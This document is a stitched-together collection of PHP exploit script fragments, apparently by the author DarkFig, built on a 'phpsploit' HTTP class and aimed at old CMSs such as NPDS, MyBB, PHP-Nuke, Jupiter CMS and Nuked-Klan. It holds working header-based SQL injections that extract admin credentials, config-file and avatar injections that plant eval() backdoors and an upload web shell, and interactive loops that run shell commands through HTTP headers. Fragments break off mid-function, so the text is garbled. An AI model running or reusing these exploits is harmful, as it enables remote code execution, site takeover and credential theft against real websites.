function main() { // :) $web = new phpsploit(); $web->agent('Mozilla Firefox'); // Hey ya :) head(); // Target $url = get_p('url', true); // Proxy options $prh = get_p('proxhost'); $pra = get_p('proxauth'); // Use a proxy ? if ($prh) { // host:ip $web->proxy($prh); // Authentication if ($pra) { $web->proxyauth($pra); } } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5(rand(0, 1000000000) . 'HEY_YA'); $c_sep = "print('{$s_sep}');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while (($cmd = cmd_prompt()) !== false) { // magic_quotes_gpc bypass $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");')); // Go =] $web->get($url . 'index.php?fields=' . to_char($final) . ',1'); // Result $res = explode($s_sep, $web->getcontent()); // Erf if (!isset($res[1])) { print "\nFailed"; exit(1); } else { if (empty($res[1])) { print "\nNo output: system() disabled OR cmd failed OR cmd without output"; } else { print "\n" . $res[1]; } } } return; }
# 212. $file = fopen("config.php","w"); # 401. $content .= "\$perpage = $xperpage;\n"; # 402. $content .= "\$popular = $xpopular;\n";... # 614. fwrite($file, $content); # 615. fclose($file); # $PHPCODE = 'if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER])'; # Default config value # You can get the config here ./admin.php?op=Configure # $config = array(frmdt_url => $url . 'admin.php', "xparse" => "1", "xgzhandler" => "0", "xfilemanager" => "0", "xadmin_cook_duration" => "240", "xuser_cook_duration" => "8000", "xsitename" => "NPDS SABLE", "xTitlesitename" => "NPDS - générateur de portail Php / Mysql en Open Source", "xnuke_url" => "http://www.npds.org", "xsite_logo" => "themes/Permanent-Double-Side/images/npds_p.gif", "xslogan" => "NPDS SABLE", "xstartdate" => "01/10/2005", "xtop" => "10;{$PHPCODE}", "xstoryhome" => "10", "xoldnum" => "10", "xultramode" => "1", "xanonymous" => "Anonyme", "xanonpost" => "0", "xtroll_limit" => "6", "xmod_admin_news" => "0", "xnot_admin_count" => "1", "xDefault_Theme" => "Permanent-Double-Side", "xstart_page" => "index.php?op=edito", "xlanguage" => "french", "xmulti_langue" => "false", "xlocale" => "french", "xlever" => "08:00", "xcoucher" => "20:00", "xgmt" => "", "xbanners" => "0", "xmyIP" => "1.1.1.100", "xfoot4" => "", "xbackend_title" => "NPDS", "xbackend_language" => "fr-FR", "xfoot1" => "Tous les Logos et Marques sont déposés, les commentaires sont sous la responsabilité de ceux qui les ont publiés, le reste @ npds.org", "xfoot2" => "Ce site a été construit avec <a href=http://www.npds.org CLASS=NOIR>NPDS</a>, un système de portail écrit en PHP. Ce logiciel est sous <a href=http://www.gnu.org CLASS=NOIR>GNU/GPL license</a>.", "xfoot3" => "syndication de vos News via <a href=http://www.votre_site/backend.php CLASS=NOIR>www.votre_site/backend.php</a> -::- + encore via le NPDS Push Infos System", "xbackend_image" => "", "xbackend_width" => "88", "xbackend_height" => "31", "xperpage" => "10", "xpopular" => "10", "xnewlinks" => "10", "xtoplinks" => "10", "xlinksresults" => "10", "xlinks_anonaddlinklock" => "0", "xlinkmainlogo" => "0", "xOnCatNewLink" => "1", "xadminmail" => "", "xmail_fonction" => "1", "xEmailFooter" => "", "xnotify" => "0", "xnotify_email" => "*****@*****.**", "xnotify_subject" => "Nouvelle soumission", "xnotify_message" => "Le site a recu une nouvelle soumission !", "xnotify_from" => "webmaster", "xmoderate" => "1", "xcommentlimit" => "4096", "xmaxOptions" => "12", "xBarScale" => "1", "xsetCookies" => "1", "xpollcomm" => "1", "xtipath" => "themes/Permanent-Double-Side/images/topics/", "xuserimg" => "/themes/Permanent-Double-Side/images/menu/", "xadminimg" => "images/admin/", "xadmingraphic" => "0", "xadmf_ext" => "gif", "xshort_menu_admin" => "1", "xsite_font" => "Verdana, Arial, Helvetica", "xadmart" => "10", "xminpass" => "5", "xshow_user" => "20", "xsmilies" => "1", "xavatar_size" => "60*80", "xshort_user" => "0", "xAutoRegUser" => "1", "xmemberpass" => "1", "xsubscribe" => "1", "xmember_invisible" => "0", "xCloseRegUser" => "0", "xhttpref" => "1", "xhttprefmax" => "1000", "xmember_list" => "0", "xdownload_cat" => "Tous", "xshort_review" => "0", "xrss_host_verif" => "false", "xcache_verif" => "true", "xdns_verif" => "false", "xsavemysql_size" => "256", "xsavemysql_mode" => "1", "xtiny_mce" => "true", "op" => "ConfigSave"); # 0_o my website has been reset # $xpl->formdata($config); while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->addheader("Referer", "@system({$cmd});die;"); $xpl->get($url . 'config.php'); print $xpl->getcontent() . "\n\$shell> "; } function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { exit("\n-{$param} parameter required"); } else { return;
} $xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject="); $xpl->get($url . 'myadmin.php?choix=1'); if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) { die("\nsploit> Can't retrieve the forum id"); } $forumid = $fid[1][count($fid[1]) - 1]; $xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}"); print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> "; if (empty($avatarur)) { $avatarur = "./avatar/{$name}.jpg"; } $xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}"); $xpl->reset(); while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->addheader("Referer", $cmd); $xpl->get($url . $name . '.php'); $data = explode("337666733", $xpl->getcontent()); print $data[1] . "\n\$shell> "; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of
if ($pra) { $xpl->proxyauth($pra); } print "0x01>Deleting the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); print "\n0x03>Trying to log in as Administrator"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); // Minimum data necessary (fwrite without quote) $minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1'; print "\n0x04>Creating the file config.inc.php"; $xpl->post($url . 'dirsys/modules/config/post.php', $minimdata); print "\n0x05>Now enter your commands"; do { $xpl->addheader('Shell', "@system({$cmd});"); $xpl->get($url . 'dirsys/config.inc.php'); print $xpl->getcontent() . "\n0x06>"; } while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN)))); exit(0); function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { usage(); } else {
# dateline: 1175443967 # lastactive: 1175444369 # # $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. # We can also add an administrator (easily) ... but it's not interesting. # print "\nAdmin IP : "; $ip = sql_inject('ip'); print "\nAdmin sid: "; $sid = sql_inject('sid'); print "\nTrying to be logged in as administrator"; $xpl->addheader('Client-IP', $ip); $xpl->get($url . "admin/languages.php?adminsid={$sid}"); # Trying to find the language if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) { $lang = $langmatches[1]; } else { $lang = 'english'; } print "\nLanguage: {$lang}"; # Language configuration $xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}"); preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value); # We can't use: # - <? OR <?php # - <script language="php"> # - ' OR "
$xpl->proxyauth($authp); } # +nukesentinel.php # 49. if($ab_config['disable_switch'] > 0) { return; } # 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) { # 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`, # `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`, # `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."', # '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from', # '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."', # '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')"); # # We insert a row in $prefix."_nsnst_tracked_ips". # print "\nInserting a row in {$prfix}_nsnst_tracked_ips"; $xpl->addheader("Client-IP", "255.255.255.255"); $xpl->get($url . 'index.php'); # Trying to find a valid tid. # Needed for $tum > 0. # print "\nTrying to find a valid tid (max hits={$nbtst})"; $sql = "' OR 1=1#"; $xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:'))); for ($c = $tid; $c <= $nbtst; $c++) { $xpl->get($url . "includes/nsbypass.php?tid={$c}"); if (!preg_match("#phpnuke.org#", $xpl->getheader())) { $tid = $c; print "\nValid tid found: {$tid}\nHash: {$login} -> "; break; } if ($c == $nbtst) {
} if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) { $img = $match[1]; } else { die(" * can't find image name\n"); } /* Change homepage to our avatar, with a null byte, after saving website name. */ print " * changing homepage\t"; preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all); $postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n"; $success = true; if ($mode == 0) { print " * loading uploader\t"; $xpl->addheader("upload", "1"); if (preg_match("#upfiledone#i", $xpl->get($url))) { print "done\n"; } else { $success = false; print "error\n"; } } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; }
$mode = getparam("mode") ? getparam("mode") : 0; $adm = getparam("admin"); $acc = getparam("user"); $prx = getparam("proxy"); $prefix = getparam("prefix") ? getparam("prefix") : "nuked_"; $file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>'; $date = array(date('Y'), date('m'), date('d')); $xpl = new phpsploit(); if ($prx) { $xpl->proxy($prx); } /* Admin account defined */ if ($adm) { print "[*] Using admin account {$adm}\n"; list($login, $passwd) = explode(":", $adm); $xpl->addheader("Referer", $url); $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok"); if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) { $admin_sid = $sid[1]; $admin_uid = $uid[1]; print " SID -> {$admin_sid}\n"; print " UID -> {$admin_uid}\n"; finalattack($admin_sid, $admin_uid); } else { exit("[*] Can't log in\n"); } } else { /* User account defined */ if ($acc) { print "[*] Using user account {$acc}\n"; list($login, $passwd) = explode(":", $acc);
<?php /* Title: Jupiter CMS 1.1.5 SQL Injection Vulnerability Advisory ID: 12070214 Risk level: High Author: DarkFig <*****@*****.**> URL: http://www.acid-root.new.fr/advisories/12070214.txt */ error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #"; $xpl->addheader("Client-IP", $hev); $xpl->get($url); preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr); preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd); print $usr[1] . '::' . $pwd[1]; /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
$config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'{$config['3']}0',(SELECT pseudo FROM {$config['0']}_users {$config['2']}),'{$config['3']}0'"; $request[] = "'{$config['3']}1',(SELECT pass FROM {$config['0']}_users {$config['2']}),'{$config['3']}1'"; $request[] = "'{$config['3']}2',(SELECT id FROM {$config['0']}_users {$config['2']}),'{$config['3']}2'"; $request[] = "'{$config['3']}3',(SELECT id FROM {$config['0']}_sessions WHERE user_id=(SELECT id FROM {$config['0']}_users {$config['2']})),'{$config['3']}3'"; for ($i = 0; $i < count($request); $i++) { $deb = rand(0, 10000) . "',2," . (time() + 500000) . ",'',(SELECT CONCAT("; $sql = $deb . $request[$i] . "))) #"; $xpl->addheader("X-Forwarded-For", $sql); $xpl->get($url); $xpl->reset('header'); } if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) { die("Exploit Failed"); } $what = array("login", "passwd", "user_id", "session"); for ($i = 0; $i < count($what); $i++) { print "\n" . $what[$i] . " -> " . $matches[2][$i]; } if (empty($matches[2][3])) { exit("\nNo session found"); } # Logged in as admin $name = array("admin_session", "user_id", "sess_id");
# 1056. $display_page = abget_template($blocker_row['template']); // $blocker_row['template'] ... 6,7,--->'../config.php'<---,9 # # # 1004. function abget_template($template="") { # 1013. $filename = "abuse/".$template; // $template = ../config.php # 1014. if(!file_exists($filename)) { $filename = "abuse/abuse_default.tpl"; } # 1015. $handle = @fopen($filename, "r"); # 1016. $display_page = fread($handle, filesize($filename)); # 1017. @fclose($handle); # 1041. return $display_page; # 1042. } # # Interesting isn't it ? :] # $sql = "' UNION SELECT 1,2,3,4,5,6,7," . mysqlchar("' UNION SELECT -666,2,3,4,5,6,7,'../{$file}',9,10,11 ORDER BY blocker #") . ",9,10,11,12,13,14,15,16,17,18#255.255.255.255"; $xpl->addheader("Client-IP", $sql); $xpl->get($url . 'index.php'); print $xpl->getcontent(); function mysqlchar($data) { $char = 'CHAR('; for ($i = 0; $i < strlen($data); $i++) { $char .= ord($data[$i]); if ($i != strlen($data) - 1) { $char .= ','; } } return $char . ')'; } function getparam($param, $opt = '') {